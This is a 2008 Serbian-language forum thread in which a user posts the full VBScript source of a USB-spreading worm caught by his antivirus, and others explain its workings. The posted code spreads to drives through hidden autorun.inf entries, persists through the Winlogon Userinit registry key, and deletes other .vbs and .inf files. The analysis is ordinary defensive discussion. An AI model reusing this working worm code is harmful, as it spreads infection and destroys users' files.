• Naslovna
• FAQ
• Pravilnik
• O ES-u
• Tim
• Korisnici
• Statistike

 

• elitesecurity ::
• elitemadzone ::
• EMAIL ::
• RSS ::
• ES Mobile

  Niste ulogovani?  Username :   Password:   

• Registracija
• Zaboravili ste password?
• Flashback ▲▼
• Login problem?

 

Pretraga:

 

Srodne teme 14.04.2024. Re: Gde je Kejt? (samo pogrešni odgovori) 28.12.2003. Trojanac u OpenSSH kodu 05.05.2009. Da li postoji "legalan" trojanac 05.01.2004. Kakav je ovo trojanac? 02.08.2004. trojanac ili worm? 12.11.2004. Trojanac ESEPOR.AK ne moze da se unisti... 19.05.2005. Da li je wuauclt1.exe trojanac, virus? 22.02.2006. trojan downloader win32 bagle.ac 11.08.2006. Treba mi malo pojasnjenje sta tacno radi ovaj c- .. 04.04.2007. Trojanac SbBot = Sta da mu radim ? Navigacija Brisanje liste Aktuelne teme u ovom forumu: citanje el licne karte i saobracajne d.. Da li je moguce napraviti kviz TV SLAG.. Visual Basic u Excelu eFiskalizacija sa VB6 Too many line continuations greška Run Time Error 361 Can't Load or unlo.. Kako da re-kreiram program sa slike ? Kako da re-kreiram program sa slike VB6 Brojanje ulaznih impulsa na parale.. Pjesmarica u VB - pomoc u pravljenju p.. VB6 mysql - latinična slova ščđćž Excel VBA - potencijalna prevara ili ? Popunjavanje Word TextBox-ova wscript - Error 800A01AD Problemi sa ispisom na POS printer č .. Izaberite forum: Linux Linux aplikacije Linux desktop okruženja Linux hardware Windows desktop Windows aplikacije Zaštita Office Windows drajveri Office :: Word Office :: Excel Macintosh Mac hardware Mac software Iphone Enterprise Networking SOHO Networking Wireless Windows mreže Linux mreže Wireless :: WiMax Wireless :: Mikrotik Wireless :: Wireless oprema Linux/UNIX serveri i servisi Unix BSD Skript jezici Security Virtualizacija Cloud Computing Services Security :: Kriptografija i enkripcija .NET 3D programiranje Art of Programming Asembler C/C++ programiranje Kernel i OS programiranje Pascal / Delphi / Kylix Java Embedded sistemi Perl PHP Python Visual Basic 6 Veštačka inteligencija Security Coding XML GameDev - Razvoj Igara Ostali programski jezici PHP :: PHP za početnike PHP :: Smarty template engine .NET :: .NET Desktop razvoj .NET :: ASP.NET .NET :: WPF Programiranje C/C++ programiranje :: C/C++ za početnike Baze podataka MySQL Oracle Access MS SQL Firebird/Interbase PostgreSQL Fiksna telefonija VoIP Udruženje korisnika teleko.. GSM - telefoni GSM - upotreba GSM - servisiranje Mreže i novosti Smartphone Mreže i novosti :: Mobilni internet Mreže i novosti :: Telenor - korisnički servis Mreže i novosti :: VIP - korisnički servis Mreže i novosti :: MTS - korisnički servis Smartphone :: Symbian OS Smartphone :: Windows Mobile Smartphone :: Android GSM - telefoni :: Nokia PDA Uređaji GPS Portable Players Anonimnost i privatnost ISP Browseri E-mail Instant Messaging FTP Google Hosting ISP :: Wireless mreže i ISP ISP :: ADSL E-mail :: Anti-spam Instant Messaging :: IRC Hosting :: Domeni Google :: Gmail E-Marketing Web aplikacije Web dizajn i CSS Web dizajn softver Web razvoj Pretraživači i SEO Flash Javascript i AJAX Web dizajn i CSS :: Kritike Grafički dizajn Izdavaštvo 3D modelovanje Rasterska grafika Vektorska grafika 3D modelovanje :: CAD/CAM Matične ploče, procesori .. Video karte i monitori Storage Ostali hardver Overclocking & Modding PC Konfiguracije Laptopovi Vodič za kupovinu - PC har.. Tablet PC Muzička produkcija Audio kompresija Audio softver Video produkcija Video kompresija Video softver Multimedijalni uređaji Digitalni fotoaparati Digitalne kamere Home Theater Digitalni fotoaparati :: Fotografija Digitalni fotoaparati :: Vodič za kupovinu - Digita.. Elektronika Elektrotehnika Elektronika :: TV uređaji Elektronika :: Radio elektronika i tehnika Elektronika :: Mikrokontroleri Elektronika :: Audio-elektronika Auto-elektronika :: Tuning Vodič za učenje Vodič za posao Vodič za emigraciju Fizika Matematika Nauka Sertifikati Informatika Vodič za učenje :: Seminarski radovi Vodič za učenje :: Obrazovne institucije Vodič za emigraciju :: Život u USA Vodič za emigraciju :: Život u Norveškoj Vodič za emigraciju :: Život u Nemačkoj E-Poslovanje E-Kupovina IT pravo i politika razvoja IT događaji IT berza poslova IS i ERP Ekonomija Berza Cryptocoins IT berza poslova :: Arhiva IT berze poslova IT pravo i politika razvoja :: Registar Nacionalnog ID E-Poslovanje :: E-Transakcije E-Poslovanje :: Forex E-Kupovina :: Platne kartice Digitalna Televizija Advocacy Ankete Predlozi i pitanja Vesti Čekaonica Vesti :: ES leto manifestacija MadZone TechZone Poljoprivreda AutoZone MotoZone Svakodnevnica Video igre MadZone :: Zanimljivi linkovi MadZone :: Kultura TechZone :: Ergonomija TechZone :: Grejanje TechZone :: Klimatizacija TechZone :: Bela tehnika AutoZone :: Fiat Panda club Lista poslednjih: 16, 32, 64, 128 poruka.

Srđan Pavlović Specijalna Edukacija i Rehabilitacija MNRO Vojvodina, Bačka Palanka Član broj: 139340 Poruke: 5571 77.46.204.* Sajt: www.oligofrenolog.com +382 Profil Sta tacno radi ovaj trojanac? 12.03.2008. u 03:19 - pre 196 meseci Code: Option Explicit On Error Resume Next Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg Set Fso = CreateObject("Scripting.FileSystemObject") Set Shells = CreateObject("Wscript.Shell") Set WinDir = Fso.GetSpecialFolder(0) Set SystemDir =Fso.GetSpecialFolder(1) Set File = Fso.GetFile(WScript.ScriptFullName) Set Drv=File.Drive Set InDrive = Fso.drives Set ReadAll=File.OpenAsTextStream(1,-2) do while not ReadAll.atendofstream AllFile = AllFile & ReadAll.readline AllFile = AllFile & vbcrlf Loop Count=Drv.DriveType Do  If Not Fso.FileExists(SystemDir & "\killVBS.vbs") then   set WriteAll = Fso.CreateTextFile(SystemDir & "\killVBS.vbs",2,true)   WriteAll.Write AllFile    WriteAll.close   set WriteAll = Fso.GetFile(SystemDir & "\killVBS.vbs")   WriteAll.Attributes = -1 End If Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _ SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs" For Each Drives In InDrive  If Drives.DriveType=2 Then    LookVBS "inf",Drives.Path & "\"    LookVBS "INF",Drives.Path & "\" End if   If Drives.DriveType = 1 Or Drives.DriveType = 2 Then   If Drives.Path<> "A:" Then       Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"       Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""       Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""       Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"       LookVBS "vbs",WinDir & "\"       LookVBS "vbs",Drives.Path  & "\"     If Drives.DriveType = 1 Then      If Drives.Path<>"A:" Then      If Not Fso.FileExists(Drives.Path & "\killVBS.vbs") Then        Set WriteAll=Fso.CreateTextFile(Drives.Path & "\killVBS.vbs",2,True)        WriteAll.Write AllFile        WriteAll.Close        Set WriteAll = Fso.GetFile(Drives.Path & "\killVBS.vbs")        WriteAll.Attributes = -1        End If                If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then            Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")           Chg.Attributes = -8           Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)           WriteAll.writeline "[autorun]"           WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"           WriteAll.Close           Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")           WriteAll.Attributes = -1        else           Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)           WriteAll.writeline "[autorun]"           WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"           WriteAll.Close           Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")           WriteAll.Attributes = -1        End if        End If      End if   End if     End If   Next   if Count <> 1 then Wscript.sleep 10000 end if loop while Count<>1  sub LookVBS(File2Find, SrchPath)     Dim oFileSys, oFolder, oFile,Cut,Delete     Set oFileSys = CreateObject("Scripting.FileSystemObject")     Set oFolder = oFileSys.GetFolder(SrchPath)     For Each oFile In oFolder.Files     Cut=Right(oFile.Name,3)     If UCase(Cut)=UCase(file2find) Then       If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)      End If     Next  End sub Ovaj je pokusao da mi prodje, ali ga je AVG uhvatio, pa sam ga iskopao iz karantina i prebacio u TXT fajl. Ovo je copy/pase samog koda. PS : izvinjavam se ako sam stavio pitanje u pogresan jezik, ovo mi lici na VB, mada nisam siguran. oligofrenolog Odgovor na temu

Aleksandar Vasic Web Administrator, Uspon d.o.o Čačak Član broj: 91692 Poruke: 1226 *.eunet.yu. Sajt: www.vasictech.net +1 Profil Re: Sta tacno radi ovaj trojanac? 12.03.2008. u 09:09 - pre 196 meseci koliko sam video stvara fajlove killVBS.vbs i fajl autorun.inf u svim drajvovima i ubacuje ga u registry,sem ako je flopy(a:) jer bi ga to usporilo :D i cini mi se da se samo razmnozava......sacekaj iskusnije korisnike ;) ako ti ne obrishu temu... Odgovor na temu

stefanpn Total anonymous Programer Član broj: 172809 Poruke: 509 79.101.233.* +1 Profil Re: Sta tacno radi ovaj trojanac? 12.03.2008. u 12:11 - pre 196 meseci Kako ti rece the_end samo se razmnozava po drajvovima i pravi "autorun.inf" tako da win explorer umesto da "otvori" root drajva on pokrene "wscript.exe KillVBS.vbs", i malo "prcka" po registry bazi i pravi nove kopije... U svakom slucaju, nista ozbiljno. Odgovor na temu

Marko_L Beograd Član broj: 20532 Poruke: 2885 *.dynamic.sbb.co.yu. Jabber: Marko_L@elitesecurity.org +828 Profil Re: Sta tacno radi ovaj trojanac? 12.03.2008. u 18:37 - pre 196 meseci Citat: i cini mi se da se samo razmnozava......sacekaj iskusnije korisnike ;) ako ti ne obrishu temu... A što bi obrisali temu, nismo imali prilike da analiziramo VB virus još od vremena kada je su VRKY i SetX ovde pokušavali da naprave ultimativno razarački proces koji zauzima par MB, izbacuje runtime-error na svakom koraku i zahteva instalaciju , pogotovo što je u pitanju amaterski pokušaj koji je praktično bezopasan, jer ovakvo korišćenje WScript-a izvaljuje svaki AV nekoliko godina unazad :) -Odracuonogakomijedrpiorazmaknicu. -Ne rxdi mi txstxturx, kxd god hocu dx ukucxm "x" onx ukucx "x". -Ko kaaz e da ja neuummem da kuuca m. -Piše "Insert disk 3", a jedva sam i ova dva ugurao u drajv -Postoje samo dve osobe kojima verujem, jedna sam ja, a druga nisi ti Odgovor na temu

Aleksandar Vasic Web Administrator, Uspon d.o.o Čačak Član broj: 91692 Poruke: 1226 *.eunet.yu. Sajt: www.vasictech.net +1 Profil Re: Sta tacno radi ovaj trojanac? 12.03.2008. u 19:30 - pre 196 meseci ponekad valja i 'vako neshto da se postavi chisto da razvijamo vijuge :P Odgovor na temu

Aleksandar Ružičić Software Architect, Appricot d.o.o. Beograd Član broj: 26939 Poruke: 2881 Jabber: krckoorascic@gmail.com Sajt: krcko.net +44 Profil Re: Sta tacno radi ovaj trojanac? 12.03.2008. u 19:41 - pre 196 meseci Citat: Marko_L: A što bi obrisali temu, nismo imali prilike da analiziramo VB virus još od vremena kada je su VRKY i SetX ovde pokušavali da naprave ultimativno razarački proces koji zauzima par MB, izbacuje runtime-error na svakom koraku i zahteva instalaciju , pogotovo što je u pitanju amaterski pokušaj koji je praktično bezopasan, jer ovakvo korišćenje WScript-a izvaljuje svaki AV nekoliko godina unazad :) eh, vrky i set_x, njih sam skoro i zaboravio :) rafforum.rs - Forum Računarskog Fakulteta Odgovor na temu

Srđan Pavlović Specijalna Edukacija i Rehabilitacija MNRO Vojvodina, Bačka Palanka Član broj: 139340 Poruke: 5571 77.46.204.* Sajt: www.oligofrenolog.com +382 Profil Re: Sta tacno radi ovaj trojanac? 12.03.2008. u 20:30 - pre 196 meseci pa i ja sam to skontao, onoliko koliko sam uspeo procitati kod, ne znam bas VB ali znam nesto Delphi da mogu iscitati otprilike sta radi, da se kopira, ali nisam u kodu nasao neke akcije sem toga pa reko da pitam za svaki slucaj, da nisam prevideo nesto ozbiljnije. Znaci, koja je bila poenta onoga sto je pravio ovaj program, ako zaista ovaj ne radi nista drugo sem sto se kopira na neke drajvove. Ovaj deo sto si rekao "prcka po registriju", to bi moglo biti vrlo znacajno - sta tacno "prcka po registriju"? Vidim da sa Shells.RegWrite nesto upisuje, mislim vidim i sta ali mi nije jasno sta dalje sa tim sto je upisano, tj, koje su posledice. Pozdrav. Inace, ovo je prvi put da sam naleteo na virus i to ne sa neta nego mi drug doneo USB-Flash da mu nesto prebacim, i cim sam ga utakao, odmah ga je AVG savatao vec kod Autoruna verovatno (tj, otvaranja root foldera usb-a). oligofrenolog Odgovor na temu

Aleksandar Vasic Web Administrator, Uspon d.o.o Čačak Član broj: 91692 Poruke: 1226 *.eunet.yu. Sajt: www.vasictech.net +1 Profil Re: Sta tacno radi ovaj trojanac? 12.03.2008. u 20:37 - pre 196 meseci prcka to,da sledeci put kada se startuje windows,pokrene taj .vbs fajla da bi se ponovo razmnozio ;) pa eto vidish ne razmnozava se samo po hdd-u,nego se ubacuje na sve jedinice osim flopija i na taj nacin se prenosi i na druge racunare ;) Odgovor na temu

stefanpn Total anonymous Programer Član broj: 172809 Poruke: 509 79.101.233.* +1 Profil Re: Sta tacno radi ovaj trojanac? 12.03.2008. u 20:58 - pre 196 meseci 1. Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL" 2. Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","" 3. Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","" 4. Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2" 1. Brise MS32DLL iz start up-a (Tog zapisa i nema u mom registry-ju!) 2. Upisuje vbNullString("") u Window Title (kod mene nema ni toga) 3. Upisuje vbNullString("") u Start Page (menja ti pocetnu stranu u prazno, kad pokrenes IE) 4. Menja ikonu za vbs datoteke I to bi bilo to Odgovor na temu

dava Banja Luka Član broj: 27208 Poruke: 893 +384 Profil Re: Sta tacno radi ovaj trojanac? 13.03.2008. u 08:24 - pre 196 meseci Na ovaj nacin obezbjedjuje startup (sto je malo skriveniji nacin od onih uobicajenih '...\CurrentVersion\Run') Code: Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _ SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs" Ovdje postavlja svoj exe fajl da je default-ni program za otvaranje .vbs skripti. Code: Shells.RegWrite "HKCR\vbsfile\DefaultIcon", "%SystemRoot%\System32\WScript.exe,2" U sustini nista znacajno ne radi osim sirenja. SELECT * FROM หน่วยงานหลัก WHERE ยสันติ LIKE 'โดย%' Odgovor na temu

Aleksandar Vasic Web Administrator, Uspon d.o.o Čačak Član broj: 91692 Poruke: 1226 *.eunet.yu. Sajt: www.vasictech.net +1 Profil Re: Sta tacno radi ovaj trojanac? 13.03.2008. u 09:38 - pre 196 meseci znaci nije trojanac ni virus,nego crv ;) Odgovor na temu

Srđan Pavlović Specijalna Edukacija i Rehabilitacija MNRO Vojvodina, Bačka Palanka Član broj: 139340 Poruke: 5571 77.46.167.* Sajt: www.oligofrenolog.com +382 Profil Re: Sta tacno radi ovaj trojanac? 16.03.2008. u 16:55 - pre 195 meseci AVG ga je oznacio kao trojanca, i to ima i neko ime, zaboravio sam :) oligofrenolog Odgovor na temu

Shadowed Vojvodina Član broj: 649 Poruke: 12848 +4784 Profil Re: Sta tacno radi ovaj trojanac? 16.03.2008. u 17:55 - pre 195 meseci Ma i antivirusi svakojako oznacavaju i cesto nije tacno. A nekad su i dovoljno bezobrazni da keygen-ove i sl. programe proglasavaju malware-om (i kada to provereno nisu). Nebojsa Milanovic: Što se tiče Trumpa, smatram ga vrhunskim predsednikom i voleo bih da živim u državi na čijem je on čelu. Nebojsa Milanovic: Rusija ne laže, ne vodi osvajačke ratove Nebojsa Milanovic: Trump je svetla tačka u USA blatu. Odgovor na temu

Eurora3D Team Nebojsa - Programer & Vodja tima Beograd Član broj: 120376 Poruke: 900 91.148.114.* +7 Profil Re: Sta tacno radi ovaj trojanac? 18.03.2008. u 15:51 - pre 195 meseci Da se nadovezem na ovo sto je rekao @Shadowed jer mislim da je bas dobro uocio stvar. Svaka cast antivirus programima . Uglavnom su korisni ali nekad mogu da upropaste neku firmu (slucajno ili namerno) tako sto njihov program oznace kao virus (npr neki Remote desktop program isl) a ustvari nije. Treba to imati u vidu da bi bili objektivni HomePage http://www.eurora3d.com Odgovor na temu

deepwhite Član broj: 92996 Poruke: 559 212.200.70.* +3 Profil Re: Sta tacno radi ovaj trojanac? 21.03.2008. u 12:38 - pre 195 meseci Meni je AVG pre dva meseca prebacio sve .exe fajlove sa 2 harda u vault. kada sam ih vratio i pokusao da pokrenem bilo koji od njih sistem se rusio. fazon je da kada bi ih pokretao i na drugim racunarima takodje su sistemi padali?! sada me je strah da postavim bilo koji antivirus a opet ne mogu bez njih jer sam 24h na mrezi :( Odgovor na temu

Aleksandar Ružičić Software Architect, Appricot d.o.o. Beograd Član broj: 26939 Poruke: 2881 Jabber: krckoorascic@gmail.com Sajt: krcko.net +44 Profil Re: Sta tacno radi ovaj trojanac? 21.03.2008. u 13:28 - pre 195 meseci pa ako si 24h na mrezi, tebi ne treba antivirus, nego firewall i zdrav razum, ja antivirus (AVG) koristim jedino da se zastitim od zarazenih fajlova koje mogu da dobijem preko flash-ova ili diskova. sto se tice firewall-a ja koristim Kerio Personal Firewall, koji mozes besplatno skinuti odavde: http://www.321download.com/Las...ml#Kerio%20Personal%20Firewall rafforum.rs - Forum Računarskog Fakulteta Odgovor na temu